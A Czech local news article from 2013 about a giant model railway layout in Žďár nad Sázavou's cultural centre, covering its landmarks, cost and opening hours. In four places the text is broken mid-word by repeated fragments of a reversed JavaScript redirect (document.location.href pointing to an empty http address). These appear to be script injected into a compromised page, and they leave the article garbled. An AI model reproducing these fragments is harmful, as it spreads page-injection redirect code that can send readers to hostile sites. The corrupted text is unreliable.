Žďár nad Sázavou, aktuality, kolejiště
Rainbow page separator

Stavba obřího kolejiště se blíží do finále

Čtvrtek, 1. srpna 2013

kolejiste2Žďár nad Sázavou / Stavba modelového kolejiště, které už tři roky vzniká ve žďárském Domě kultury, se pomalu chýlí ke konci. Za tu dobu rozestavěné kolejiště s vláčky, stanicemi a vysočinskou krajinou vidělo už na čtyřicet tisíc lidí. Slavnostní otevření modeláři z občanského sdružení Modelové království Žďár pod vedením Radislava Wimmera plánují na květen 2014. Unikátní kolejiště patří mezi největší v republice.

Na ploše 55 čtverečních metrů je šest s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovek metrů kolejí a 180 výhybek. Dominan[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou je žďárská železniční stanice, nechybí ani kostel svatého Jana Nepomuckého na Zelené hoře, stanice v Hamrech nad Sázavou, Hotel Ski v Novém Městě na Moravě, ale třeba i městečko Nedvědice s hradem Pernštejnem či viadukt v Dolních Loučkách.

Provoz sedmi desítek vlakových souprav řídí počítač a nyní se modeláři chystají pustit do řady technických drobností a vylepšení. Detailům se ostatně věnují velice precizně. Na hřbi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tově se koná pohřeb, lidé u domečku grilují na rožni selátko, o kus dál hasiči hasí hořící les, v železniční stanici v Hamrech čekají lidé na vlak…

Kolejiště stálo téměř dva miliony korun. Ze začátku do stavby modeláři vložili vlastní peníze, přičemž symbolicky přispěl i Kraj Vysočina a žďárská radnice. „Ze vstupného teď vyděláváme na nájem, co zbude, dáváme na obnovu vozového parku,“ uvedl Radislav Wimmer. O prázdninách je provozní doba kolejiště rozšířená, zájemci si ho mohou prohlédnout ve středu, ve čtvrtek, v sobotu a v neděli, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to vždy od 10 do 17 hodin.